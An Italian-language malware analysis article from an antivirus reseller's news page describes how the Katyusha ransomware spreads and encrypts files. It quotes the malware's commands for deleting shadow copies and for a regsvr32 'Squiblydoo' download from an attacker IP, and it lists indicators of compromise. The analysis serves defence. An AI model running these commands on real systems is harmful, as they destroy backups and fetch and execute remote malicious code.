Utenti Home       Utenti Aziendali       Chi Siamo       Contratto EULA.

Dettaglio news

Un nuovo, sofisticato e pericoloso Ransomware: ecco Katyusha
- VENERDÌ 14 DICEMBRE 2018


Per diversi mesi i Quick Heal Security Labs hanno osservato da vicini la costante crescita dei ransomware: tra questi uno ha colpito particolarmente la nostra attenzione. Parliamo di Katyusha, un ransomware che modifica il nome dei file aggiungendovi, appunto, l'estensione .katyusha e che chiede un riscatto di 0.5 bitcoin entro 3 giorni: il ritardo nel pagamento comporta, così intima la nota di riscatto, la pubblicazione dei file sottratti. Questo malware è collegato ad altre componenti dannose, come Double Pulsar e EternalBlue, gli exploit usati dal famigerato ransomware WannaCry e molto efficaci per la diffusione di malware nelle reti. Katyusha presenta una ulteriore particolarità: usa anche un'altra tecnica di attacco per diffondersi nelle reti, chiamata “squiblydoo”. Il vettore di infezione per questo ransomware non è ancora chiaro, ma si può ridurre lo spettro delle possibilità alle seguenti: email di spea-phishing, email di spam, exploit del protocollo SMB. 

Analisi tecnica
Il Malware è preparato con MPRESS (v.2.69) e si presenta sul sistema della vittima col nome "katyusha.exe" nella cartella “%temp%”. Contiene 3 diverse componenti che vengono spostate in C:\Windows\Temp e eseguite:
  1. Svchost0.bat
  2. Zkts.exe
  3. Ktsi.exe
Fatto ciò il ransomware verifica la presenza dei seguenti file sul sistema, per capire se il sistema sia già infetto o no:

“C:\_how_to_decrypt_you_files.txt”
“C:\ProgramData\_how_to_decrypt_you_files.txt”

Se il sistema è già infetto, Katyusha crea un file batch (svchost0.bat) che contiene il codice mostrato nella figura sotto, per cancellare ogni copia di se stesso e terminarsi. 



Zkts.exe
Questo è un file eseguibile compresso con 7zip e contiene, oltre alla componente principale, una serie di moduli secondari come il modulo per la diffusione nella rete o quello per il furto di password ecc.. L'esecuzione di zkts.exe comporta l'estrazione di componenti come Mimikatz, katyusha.dll, l'exploit EternelBlue ecc... nella cartella “C:\Windows\Temp”. 

Ktsi.exe (encryptor)
L'altro componente è usato principalmente per la criptazione dei file e la creazione delle note di riscatto sul sistema infetto. Questo processo viene avviato indipendentemente dal payload principale (katyusha.exe), come si vede in figura sotto


Ktsi.exe, quando eseguito, per prima cosa termina una serie di processi per liberare gli handle dei file che sono chiusi da rilevanti processi di criptazione (pensa ai file db). Per criptare con successo i file relativi ai database, ktsi termina quei processi correlati alle app per database. 


Terminate le operazioni di "task killing" il malware scarica la nota di riscatto in formato HTML e TXT. Ecco il percorso e i nomi file relativi:

Percorso: “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”
Nome file:
  • _how_to_decrypt_you_files.txt
  • _how_to_decrypt_you_files.html
Nelle cartelle “C:\ProgramData” e sul drive C:\ viene copiata solo la versione testuale (.txt) della nota di riscatto.


Ktsi.exe inoltre cancella le Volume Shadow Copy tramite il comando "vssadmin delete shadows /all /quiet", così da impedire il recupero dei file tramite ripristino/backup. 

Dopo tutte queste operazioni viene avviata la criptazione, tramite algoritmo di criptazione RSA con l'aiuto del metodo standard di criptazione CRYPTOGAMS. Katyusha cripta tutti i file che trova nel sistema eccetto i seguenti: .ink, .url, .dll, .exe, .ios, .SYS, .sys. Il malware contiene anche una lista di esclusione di file o cartelle che, se trovati sul sistema, saranno risparmiati dalla criptazione. E' particolare notare che questa lista di esclusione contiene anche alcuni software antivirus:


Meccanismo di diffusione
Per la diffusione nella rete entrano in gioco i file estratti da zkts. m32.exe e m64.exe sono gli eseguibili del tool Mimikatz, usato per il furto delle credenziali da Isass.exe. Katyusha, per prima cosa, deve quindi determinate la versione del SO (32 o 64 bit) usando IsWow64Process (che rende un valore diverso da 0 se il sistema è a 64-bit): fatto ciò viene eseguita la versione di Mimikatz adatta all'architettura del sistema. Mimikatz rende, in “C:\Windows\Temp” due file:
  • snamelog - che contiene gli username recuperati
  • spasslog - che contiene le password per i rispettivi username recuperati. 

Katyusha.exe a questo punto esegue un attacco di brute-force nella rete. Zkts.exe copia anche i seguenti file: svchostb.exe, svchostb.xml, svchostbs.exe, svchostbs.xml, katyusha.dll e svchostp.exe. Queste sono le componenti utili per la diffusione nella rete


Grazie a EternalBlue e DoublePulsar, il malware esegue katyusha.dll consecutivamente sui sistemi connessi alla rete. L'attacco contro la vulnerabilità del protocollo SMB avviene sulla porta 445. 

"Squiblydoo"
Katyusha.dll è il payload che esegue il comando: 
“regsvr32 /u /s /i:hxxp://86.106.102.147/img/katyusha.data scrobj.dll”.

Il comando sopra comporta il download dello script katyusha.data dall'URL dato e richiama il server non registrato con il parametro regsvr32(/u). Viene quindi eseguito il javascript, che contiene a sua volta il codice per scaricare katyusha.exe dall'URL dato nella cartella "%temp%" ed eseguirlo. Fatto ciò tenta il brute-forcing del sistema con l'aiuto del Power Admin Tool (svchostp.exe): è il ransomware stesso che porta con sé una lista di username e password, che usa insieme agli username e password recuperati da Mimikatz. 

Questo meccanismo viene indicato appunto come "Squiblydoo". 

Indicatori di compromissione
1. URL
hxxp://86.106.102.147/img/katyusha.data
hxxp://86.106.102.147/img/katyusha.exe

2. Indirizzo Portafoglio Bitcoin
“3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK”


Leggi tutte le news     |     Leggi tutti gli update
Ultime news

VENERDÌ 18 GENNAIO 2019
Web Filtering: come Quick Heal protegge il tuo mondo digitale
Cos'è il web FilteringIl filtro Web, noto anche come filtro dei contenuti e filtro URL, limita l'accesso a determinati siti Web che, se aperti, potrebbero risultare danno...

leggi tutte le news

Premi e Certificazioni

La qualità dei prodotti Quick Heal vanta innumerevoli premi e certificazioni a testimonianza della sempre crescente importanza del marchi a livello mondiale nel settore Antivirus e sicurezza informatica

Continua a leggere »

Chi siamo
Panoramica
La nostra storia
Premi & Certificazioni
Scheda riepilogativa
Clienti
Dicono di noi
Trova un rivenditore
Manuali e documentazione
Chiedi aiuto
Contatti
Update
Rivenditori
Diventa rivenditore
Strumenti di supporto
Link rapidi
Rinnova ora
File di installazione
Versioni di prova
Supporto
Contratto EULA.
Download Upgrade


S-MART è un marchio di proprietà netWork Sas
P.IVA: 05345670482

© 2019 nwk - Privacy Policy - Cookie Policy - Login